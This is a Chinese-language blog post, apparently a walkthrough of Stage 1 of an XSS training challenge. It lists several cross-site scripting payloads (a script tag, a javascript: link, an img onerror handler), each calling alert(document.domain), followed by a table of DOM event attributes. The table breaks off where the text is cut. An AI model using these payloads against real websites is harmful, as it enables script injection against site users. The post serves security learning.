XSS Challenges

本文详细介绍了多个XSS挑战阶段,从标签风格、JavaScript伪协议到事件方法,逐步解析如何绕过过滤机制。涉及DOM事件、鼠标/键盘属性、IE及标准Event属性和方法。在后续阶段中,讨论了编码绕过、长度限制、双写绕过等策略,以及UTF-7编码和解密函数在XSS攻击中的应用。
摘要由CSDN通过智能技术生成


点击访问: link

Stage #1

因为第一题是处在标签中的,所以可以有多种做法

1.标签风格
<script>alert(document.domain)</script>
或
</b><sript>alert(document.domain)</script>

image-20210731222400115

image-20210731222529984

2.JavaScript伪协议
</b><a href="javascript:alert(document.domain)">224242</a>

image-20210801133732207

3.事件方法
<img src=# onerror=alert(document.domain); />

image-20210801134039659

image-20210801134059960


对DOM事件的补充:
事件句柄 (Event Handlers)

HTML 4.0 的新特性之一是能够使 HTML 事件触发浏览器中的行为,比如当用户点击某个 HTML 元素时启动一段 JavaScript。下面是一个属性列表,可将之插入 HTML 标签以定义事件的行为。

属性 此事件发生在何时…
onabort 图像的加载被中断。
onblur 元素失去焦点。
onchange 域的内容被改变。
onclick 当用户点击某个对象时调用的事件句柄。
ondblclick 当用户双击某个对象时调用的事件句柄。
onerror 在加载文档或图像时发生错误。
onfocus 元素获得焦点。
onkeydown 某个键盘按键被按下。
onkeypress 某个键盘按键被按下并松开。
onkeyup 某个键盘按键被松开。
onload 一张页面或一幅图像完成加载。
onmousedown 鼠标按钮被按下。
onmousemove 鼠标被移动。
onmouseout 鼠标从某元素移开。
onmouseover 鼠标移到某元素之上。
onmouse
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值